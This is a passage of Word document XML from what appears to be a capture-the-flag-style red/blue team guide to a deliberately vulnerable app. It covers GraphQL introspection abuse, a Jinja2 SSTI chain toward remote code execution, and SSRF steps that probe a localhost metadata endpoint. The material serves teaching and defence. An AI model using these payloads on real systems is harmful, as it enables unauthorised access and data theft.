            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">GraphQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/graphql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">__schema introspection + query salary/secret_note without admin role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SSTI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/notifications/preview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">{{7*7}} → {{config}} → subclasses chain for RCE via Jinja2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0B1929" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B1929"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴 / 🔵  Detailed Attack &amp; Defence Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Each entry includes: vulnerability explanation, step-by-step Red Team attack with exact payloads, Blue Team code-level fix, expected flag, and real-world impact.</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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF tricks the server into making HTTP requests on behalf of the attacker. The Integration Webhook Tester fetches any URL without validation — including internal IPs and localhost endpoints inaccessible from outside.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Understand the webhook test feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to Integrations → Webhook URL Tester.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Normal use: enter an external URL (e.g. https://httpbin.org/get) → server fetches it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Notice: URL is sent directly to the server — the fetch happens server-side, not in your browser!</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Probe internal network with localhost URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "Internal Metadata" quick-fill button OR type manually:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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http://127.0.0.1:7007/internal/metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Click Fetch → server makes the request from its own localhost.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
